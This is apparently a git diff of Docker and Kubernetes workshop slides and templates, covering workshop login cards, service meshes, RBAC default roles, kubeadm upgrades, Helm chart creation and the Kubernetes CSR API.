border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ cluster_or_machine }} pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
</p>
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,15 +1,14 @@
 {# Feel free to customize or override anything in there! #}
-{%- set url = "http://qconuk2019.container.training/" -%}
+{%- set url = "http://wwrk-2019-05.container.training/" -%}
 {%- set pagesize = 9 -%}
+{%- set workshop_name = "training session" -%}
 {%- if clustersize == 1 -%}
-{%- set workshop_name = "Docker workshop" -%}
-{%- set cluster_or_machine = "machine" -%}
+{%- set cluster_or_machine = "Docker machine" -%}
 {%- set this_or_each = "this" -%}
 {%- set machine_is_or_machines_are = "machine is" -%}
 {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
 {%- else -%}
-{%- set workshop_name = "Kubernetes workshop" -%}
-{%- set cluster_or_machine = "cluster" -%}
+{%- set cluster_or_machine = "Kubernetes cluster" -%}
 {%- set this_or_each = "each" -%}
 {%- set machine_is_or_machines_are = "machines are" -%}
 {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
@@ -109,26 +108,6 @@ img {
 <center>{{ url }}</center>
 </p>
 </div>
-{% if loop.index%pagesize==0 or loop.last %}
-<span class="pagebreak"></span>
-{% for x in range(pagesize) %}
-<div class="back">
-<br/>
-<p>You got this at the workshop
-"Getting Started With Kubernetes and Container Orchestration"
-during QCON London (March 2019).</p>
-<p>If you liked that workshop,
-I can train your team or organization
-on Docker, container, and Kubernetes,
-with curriculums of 1 to 5 days.
-</p>
-<p>Interested? Contact me at:</p>
-<p>jerome.petazzoni@gmail.com</p>
-<p>Thank you!</p>
-</div>
-{% endfor %}
-<span class="pagebreak"></span>
-{% endif %}
 {% endfor %}
 </body>
 </html>
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -2,4 +2,4 @@
 #/ /kube-halfday.yml.html 200
 #/ /kube-fullday.yml.html 200
 #/ /kube-twodays.yml.html 200
-/ /kube-admin-one.yml.html 200!
+/ /wwrk.yml.html 200!
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.

---

-## Section summary
+## Some popular service meshes

-We've learned how to:
+... And related projects:

-* Understand the ambassador pattern and what it is used for (service portability).
-
-For more information about the ambassador pattern, including demos on Swarm and ECS:
-
-* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
-
-* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
-
-Some services meshes and related projects:
-
-* [Istio](https://istio.io/)
-
-* [Linkerd](https://linkerd.io/)
+* [Consul Connect](https://www.consul.io/docs/connect/index.html)
+  <br/>
+  Transparently secures service-to-service connections with mTLS.
+
+* [Gloo](https://gloo.solo.io/)
+  <br/>
+  API gateway that can interconnect applications on VMs, containers, and serverless.
+
+* [Istio](https://istio.io/)
+  <br/>
+  A popular service mesh.
+
+* [Linkerd](https://linkerd.io/)
+  <br/>
+  Another popular service mesh.

---

+## Learning more about service meshes
+
+A few blog posts about service meshes:
+
+* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
+  <br/>
+  Provides historical context: how did we do before service meshes were invented?
+
+* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
+  <br/>
+  Explains the purpose of service meshes. Illustrates some NGINX features.
+
+* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
+  <br/>
+  Includes high-level overview and definitions.
+
+* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
+  <br/>
+  Includes a step-by-step demo of Linkerd.
+
+And a video:
+
+* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
@@ -528,7 +528,9 @@ Very short instructions:
 - `docker network create mynet --driver overlay`
 - `docker service create --network mynet myimage`

-See https://jpetazzo.github.io/container.training for all the deets about clustering!
+If you want to learn more about Swarm mode, you can check
+[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
+or [these slides](https://container.training/swarm-selfpaced.yml.html).

---
slides/containers/Exercise_Composefile.md (new file, 5 lines)
@@ -0,0 +1,5 @@
# Exercise — writing a Compose file

Let's write a Compose file for the wordsmith app!

The code is at: https://github.com/jpetazzo/wordsmith
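For reference, one possible solution sketch. The service names, build directories, and port mapping below are assumptions based on the wordsmith repo layout (a Postgres database, a Java API, and a web frontend), not something this exercise prescribes:

```yaml
# A minimal sketch of a Compose file for wordsmith.
version: "3"

services:
  db:
    image: postgres:10

  words:                 # assumed directory name for the Java API
    build: words
    depends_on: [ db ]

  web:                   # assumed directory name for the frontend
    build: web
    ports:
      - "8080:80"        # assumed host:container port mapping
    depends_on: [ words ]
```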
slides/containers/Exercise_Dockerfile_Advanced.md (new file, 9 lines)
@@ -0,0 +1,9 @@
# Exercise — writing better Dockerfiles

Let's update our Dockerfiles to leverage multi-stage builds!

The code is at: https://github.com/jpetazzo/wordsmith

Use a different tag for these images, so that we can compare their sizes.

What's the size difference between single-stage and multi-stage builds?
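A minimal multi-stage sketch for the Java component (the base images and paths are illustrative assumptions; the idea is that only the build stage carries the full toolchain):

```dockerfile
# Build stage: compile with the full JDK and Maven...
FROM maven:3-jdk-8 AS build
WORKDIR /src
COPY . .
RUN mvn package

# Run stage: ...ship only a JRE and the resulting jar.
FROM openjdk:8-jre-alpine
COPY --from=build /src/target/*.jar /app.jar
CMD ["java", "-jar", "/app.jar"]
```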
slides/containers/Exercise_Dockerfile_Basic.md (new file, 5 lines)
@@ -0,0 +1,5 @@
# Exercise — writing Dockerfiles

Let's write Dockerfiles for an existing application!

The code is at: https://github.com/jpetazzo/wordsmith
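One possible starting point for the Go frontend — a naive single-stage sketch (the `web` directory, Go version, and port are assumptions based on the repo layout):

```dockerfile
# Naive single-stage build: big image, but a fine first step.
FROM golang:1.12
WORKDIR /go/src/web
COPY . .
RUN go build -o /web .
EXPOSE 80
CMD ["/web"]
```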
@@ -203,4 +203,90 @@ bash: figlet: command not found

* The basic Ubuntu image was used, and `figlet` is not here.

* We will see in the next chapters how to bake a custom image with `figlet`.

---

## Where's my container?

* Can we reuse that container that we took time to customize?

  *We can, but that's not the default workflow with Docker.*

* What's the default workflow, then?

  *Always start with a fresh container.*
  <br/>
  *If we need something installed in our container, build a custom image.*

* That seems complicated!

  *We'll see that it's actually pretty easy!*

* And what's the point?

  *This puts a strong emphasis on automation and repeatability. Let's see why ...*

---

## Pets vs. Cattle

* In the "pets vs. cattle" metaphor, there are two kinds of servers.

* Pets:

  * have distinctive names and unique configurations

  * when they have an outage, we do everything we can to fix them

* Cattle:

  * have generic names (e.g. with numbers) and generic configuration

  * configuration is enforced by configuration management, golden images ...

  * when they have an outage, we can replace them immediately with a new server

* What's the connection with Docker and containers?

---

## Local development environments

* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:

  * create VM from base template (Ubuntu, CentOS...)

  * install packages, set up environment

  * work on project

  * when done, shutdown VM

  * next time we need to work on project, restart VM as we left it

  * if we need to tweak the environment, we do it live

* Over time, the VM configuration evolves, diverges.

* We don't have a clean, reliable, deterministic way to provision that environment.

---

## Local development with Docker

* With Docker, the workflow looks like this:

  * create container image with our dev environment

  * run container with that image

  * work on project

  * when done, shutdown container

  * next time we need to work on project, start a new container

  * if we need to tweak the environment, we create a new image

* We have a clear definition of our environment, and can share it reliably with others.

* Let's see in the next chapters how to bake a custom image with `figlet`!
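To make that last point concrete, a preview of what such a custom image could look like — just a sketch here; the slides build it up properly in later chapters:

```dockerfile
# A tiny custom image with figlet baked in.
FROM ubuntu
RUN apt-get update && apt-get install -y figlet
CMD ["figlet", "hello"]
```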
@@ -70,8 +70,9 @@ class: pic

* An image is a read-only filesystem.

-* A container is an encapsulated set of processes running in a
-  read-write copy of that filesystem.
+* A container is an encapsulated set of processes,
+
+  running in a read-write copy of that filesystem.

* To optimize container boot time, *copy-on-write* is used
  instead of regular copy.
@@ -177,8 +178,11 @@ Let's explain each of them.

## Root namespace

-The root namespace is for official images. They are put there by Docker Inc.,
-but they are generally authored and maintained by third parties.
+The root namespace is for official images.
+
+They are gated by Docker Inc.
+
+They are generally authored and maintained by third parties.

Those images include:
@@ -188,7 +192,7 @@ Those images include:

* Ready-to-use components and services, like redis, postgresql...

-* Over 130 at this point!
+* Over 150 at this point!

---
@@ -6,8 +6,6 @@ In this chapter, we will:

* Present (from a high-level perspective) some orchestrators.

* Show one orchestrator (Kubernetes) in action.

---

class: pic
19 new SVG files under slides/images/kubectl-run-slideshow/ (01.svg through 19.svg; roughly 1177–1239 lines and 81–84 KiB each).
@@ -1,3 +1,37 @@
+- date: 2019-11-13
+  country: fr
+  city: Marseille
+  event: DevopsDDay
+  speaker: jpetazzo
+  title: Déployer ses applications avec Kubernetes (in French)
+  lang: fr
+  attend: http://2019.devops-dday.com/Workshop.html
+
+- date: [2019-09-24, 2019-09-25]
+  country: fr
+  city: Paris
+  event: ENIX SAS
+  speaker: jpetazzo
+  title: Déployer ses applications avec Kubernetes (in French)
+  lang: fr
+  attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
+
+- date: 2019-06-17
+  country: ca
+  city: Montréal
+  event: Zenika
+  speaker: jpetazzo
+  title: Getting Started With Kubernetes
+  attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
+
+- date: [2019-06-10, 2019-06-11]
+  city: San Jose, CA
+  country: us
+  event: Velocity
+  title: Kubernetes for administrators and operators
+  speaker: jpetazzo
+  attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
+
 - date: 2019-05-01
   country: us
   city: Cleveland, OH
@@ -5,6 +39,8 @@
   speaker: jpetazzo, s0ulshake
   title: Getting started with Kubernetes and container orchestration
   attend: https://us.pycon.org/2019/schedule/presentation/74/
+  slides: https://pycon2019.container.training/
+  video: https://www.youtube.com/watch?v=J08MrW2NC1Y

 - date: 2019-04-28
   country: us
@@ -22,6 +58,7 @@
   speaker: jpetazzo
   title: Opérer et administrer Kubernetes
   attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
+  slides: https://kadm-2019-04.container.training/

 - date: [2019-04-23, 2019-04-24]
   country: fr
@@ -31,7 +68,7 @@
   title: Déployer ses applications avec Kubernetes (in French)
   lang: fr
   attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
-  slides: https://kube-2019-04.container.training
+  slides: https://kube-2019-04.container.training/

 - date: [2019-04-15, 2019-04-16]
   country: fr
@@ -30,27 +30,11 @@ chapters:
     - containers/Building_Images_With_Dockerfiles.md
     - containers/Cmd_And_Entrypoint.md
   - - containers/Copying_Files_During_Build.md
-    - |
-      # Exercise — writing Dockerfiles
-
-      Let's write Dockerfiles for an existing application!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
+    - containers/Exercise_Dockerfile_Basic.md
     - containers/Multi_Stage_Builds.md
     - containers/Publishing_To_Docker_Hub.md
     - containers/Dockerfile_Tips.md
-    - |
-      # Exercise — writing better Dockerfiles
-
-      Let's update our Dockerfiles to leverage multi-stage builds!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
-      Use a different tag for these images, so that we can compare their sizes.
-
-      What's the size difference between single-stage and multi-stage builds?
+    - containers/Exercise_Dockerfile_Advanced.md
   - - containers/Naming_And_Inspecting.md
     - containers/Labels.md
     - containers/Getting_Inside.md
@@ -64,13 +48,7 @@ chapters:
     - containers/Windows_Containers.md
     - containers/Working_With_Volumes.md
     - containers/Compose_For_Dev_Stacks.md
-    - |
-      # Exercise — writing a Compose file
-
-      Let's write a Compose file for the wordsmith app!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
+    - containers/Exercise_Composefile.md
   - - containers/Docker_Machine.md
     - containers/Advanced_Dockerfiles.md
     - containers/Application_Configuration.md
@@ -30,9 +30,11 @@ chapters:
     - containers/Building_Images_With_Dockerfiles.md
     - containers/Cmd_And_Entrypoint.md
     - containers/Copying_Files_During_Build.md
+    - containers/Exercise_Dockerfile_Basic.md
   - - containers/Multi_Stage_Builds.md
     - containers/Publishing_To_Docker_Hub.md
     - containers/Dockerfile_Tips.md
+    - containers/Exercise_Dockerfile_Advanced.md
   - - containers/Naming_And_Inspecting.md
     - containers/Labels.md
     - containers/Getting_Inside.md
@@ -45,6 +47,7 @@ chapters:
     - containers/Windows_Containers.md
     - containers/Working_With_Volumes.md
     - containers/Compose_For_Dev_Stacks.md
+    - containers/Exercise_Composefile.md
     - containers/Docker_Machine.md
   - - containers/Advanced_Dockerfiles.md
     - containers/Application_Configuration.md
@@ -143,19 +143,21 @@ class: extra-details

(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))

-- As a result, we cannot easily suspend a user's access
+- As a result, we don't have an easy way to terminate someone's access

-- There are workarounds, but they are very inconvenient:
+  (if their key is compromised, or they leave the organization)

-  - issue short-lived certificates (e.g. 24 hours) and regenerate them often
+- Option 1: re-create a new CA and re-issue everyone's certificates
+  <br/>
+  → Maybe OK if we only have a few users; no way otherwise

-  - re-create the CA and re-issue all certificates in case of compromise
+- Option 2: don't use groups; grant permissions to individual users
+  <br/>
+  → Inconvenient if we have many users and teams; error-prone

-  - grant permissions to individual users, not groups
-  <br/>
-  (and remove all permissions to a compromised user)
-
-- Until this is fixed, we probably want to use other methods
+- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
+  <br/>
+  → This can be facilitated by e.g. Vault or by the Kubernetes CSR API

---
@@ -407,7 +409,7 @@ class: extra-details

- We are going to create a service account

-- We will use an existing cluster role (`view`)
+- We will use a default cluster role (`view`)

- We will bind together this role and this service account
@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...

class: extra-details

## Where does this `view` role come from?

- Kubernetes defines a number of ClusterRoles intended to be bound to users

- `cluster-admin` can do *everything* (think `root` on UNIX)

- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)

- `edit` is similar to `admin`, but cannot view or edit permissions

- `view` has read-only access to most resources, except permissions and secrets

*In many situations, these roles will be all you need.*

*You can also customize them if needed!*

---

class: extra-details

## Customizing the default roles

- If you need to *add* permissions to these default roles (or others),
  <br/>
  you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism

- This happens by creating a ClusterRole with the following labels:
  ```yaml
  metadata:
    labels:
      rbac.authorization.k8s.io/aggregate-to-admin: "true"
      rbac.authorization.k8s.io/aggregate-to-edit: "true"
      rbac.authorization.k8s.io/aggregate-to-view: "true"
  ```

- This ClusterRole's permissions will be added to `admin`/`edit`/`view` respectively

- This is particularly useful when using CustomResourceDefinitions

  (since Kubernetes cannot guess which resources are sensitive and which ones aren't)

---

class: extra-details

## Where do our permissions come from?

- When interacting with the Kubernetes API, we are using a client certificate
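To illustrate the aggregation mechanism end to end, here is a sketch of a complete aggregated ClusterRole. The resource group and name (`example.com` / `widgets`) are hypothetical stand-ins for a CRD:

```yaml
# Sketch: grant read access to a hypothetical CRD, and fold that
# permission into the built-in "view" role via aggregation.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: view-widgets
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
rules:
- apiGroups: [ example.com ]
  resources: [ widgets ]
  verbs: [ get, list, watch ]
```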
@@ -166,7 +166,7 @@

- Upgrade kubelet:
  ```bash
-  apt install kubelet=1.14.1-00
+  apt install kubelet=1.14.2-00
  ```

]
@@ -267,7 +267,7 @@

- Perform the upgrade:
  ```bash
-  sudo kubeadm upgrade apply v1.14.1
+  sudo kubeadm upgrade apply v1.14.2
  ```

]
@@ -287,8 +287,8 @@
- Download the configuration on each node, and upgrade kubelet:
  ```bash
  for N in 1 2 3; do
-    ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
-    ssh node $N sudo apt install kubelet=1.14.1-00
+    ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
+    ssh node$N sudo apt install kubelet=1.14.2-00
  done
  ```
]
@@ -297,7 +297,7 @@

## Checking what we've done

-- All our nodes should now be updated to version 1.14.1
+- All our nodes should now be updated to version 1.14.2

.exercise[
@@ -130,6 +130,14 @@ class: pic

---

+class: pic
+
+*(image lost in extraction)*
+
+---
+
class: extra-details

## Running the control plane on special nodes

- It is common to reserve a dedicated node for the control plane
@@ -152,6 +160,8 @@ class: pic

---

+class: extra-details
+
## Running the control plane outside containers

- The services of the control plane can run in or out of containers
@@ -171,6 +181,8 @@ class: pic

---

+class: extra-details
+
## Do we need to run Docker at all?

No!
@@ -187,6 +199,8 @@ No!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
@@ -209,6 +223,8 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
@@ -225,25 +241,21 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
## Interacting with Kubernetes
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
- We will interact with our Kubernetes cluster through the Kubernetes API
|
||||
|
||||
- These resources are organized by type, or `Kind` (in the API)
|
||||
- The Kubernetes API is (mostly) RESTful
|
||||
|
||||
- It allows us to create, read, update, delete *resources*
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (a machine — physical or virtual — in our cluster)
|
||||
|
||||
- pod (group of containers running together on a node)
|
||||
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more!
|
||||
|
||||
- We can see the full list by running `kubectl api-resources`
|
||||
|
||||
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
|
||||
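To experience that RESTfulness first-hand, we can talk to the API over plain HTTP through `kubectl proxy` (a quick sketch; the proxy listens on port 8001 by default):

```bash
# In one terminal: authenticate and relay the API on localhost
kubectl proxy &

# Read resources with ordinary HTTP requests
curl http://localhost:8001/api/v1/nodes
curl http://localhost:8001/api/v1/namespaces/default/pods
```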
|
||||
---
|
||||
|
||||
@@ -253,22 +265,16 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## Credits
|
||||
|
||||
- The first diagram is courtesy of Weave Works
|
||||
- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
|
||||
|
||||
- it's one of the best Kubernetes architecture diagrams available!
|
||||
|
||||
- The second diagram is courtesy of Weave Works
|
||||
|
||||
- a *pod* can have multiple containers working together
|
||||
|
||||
- IP addresses are associated with *pods*, not with individual containers
|
||||
|
||||
- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
|
||||
|
||||
- it's one of the best Kubernetes architecture diagrams available!
|
||||
|
||||
Both diagrams used with permission.
|
||||
|
||||
114
slides/k8s/create-chart.md
Normal file
@@ -0,0 +1,114 @@
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
426
slides/k8s/csr-api.md
Normal file
@@ -0,0 +1,426 @@
|
||||
# The CSR API
|
||||
|
||||
- The Kubernetes API exposes CSR resources
|
||||
|
||||
- We can use these resources to issue TLS certificates
|
||||
|
||||
- First, we will go through a quick reminder about TLS certificates
|
||||
|
||||
- Then, we will see how to obtain a certificate for a user
|
||||
|
||||
- We will use that certificate to authenticate with the cluster
|
||||
|
||||
- Finally, we will grant some privileges to that user
|
||||
|
||||
---
|
||||
|
||||
## Reminder about TLS
|
||||
|
||||
- TLS (Transport Layer Security) is a protocol providing:
|
||||
|
||||
- encryption (to prevent eavesdropping)
|
||||
|
||||
- authentication (using public key cryptography)
|
||||
|
||||
- When we access an https:// URL, the server authenticates itself
|
||||
|
||||
(it proves its identity to us; as if it were "showing its ID")
|
||||
|
||||
- But we can also have mutual TLS authentication (mTLS)
|
||||
|
||||
(client proves its identity to server; server proves its identity to client)
|
||||
|
||||
---
|
||||
|
||||
## Authentication with certificates
|
||||
|
||||
- To authenticate, someone (client or server) needs:
|
||||
|
||||
- a *private key* (that remains known only to them)
|
||||
|
||||
- a *public key* (that they can distribute)
|
||||
|
||||
- a *certificate* (associating the public key with an identity)
|
||||
|
||||
- A message encrypted with the private key can only be decrypted with the public key
|
||||
|
||||
(and vice versa)
|
||||
|
||||
- If I use someone's public key to encrypt / decrypt their messages,
|
||||
<br/>
|
||||
I can be certain that I am talking to them / they are talking to me
|
||||
|
||||
- The certificate proves that I have the correct public key for them
|
||||
|
||||
---
|
||||
|
||||
## Certificate generation workflow
|
||||
|
||||
This is what I do if I want to obtain a certificate.
|
||||
|
||||
1. Create public and private key.
|
||||
|
||||
2. Create a Certificate Signing Request (CSR).
|
||||
|
||||
(The CSR contains the identity that I claim and an expiration date.)
|
||||
|
||||
3. Send that CSR to the Certificate Authority (CA).
|
||||
|
||||
4. The CA verifies that I can claim the identity in the CSR.
|
||||
|
||||
5. The CA generates my certificate and gives it to me.
|
||||
|
||||
The CA (or anyone else) never needs to know my private key.
|
||||
|
||||
---
|
||||
|
||||
## The CSR API
|
||||
|
||||
- The Kubernetes API has a CertificateSigningRequest resource type
|
||||
|
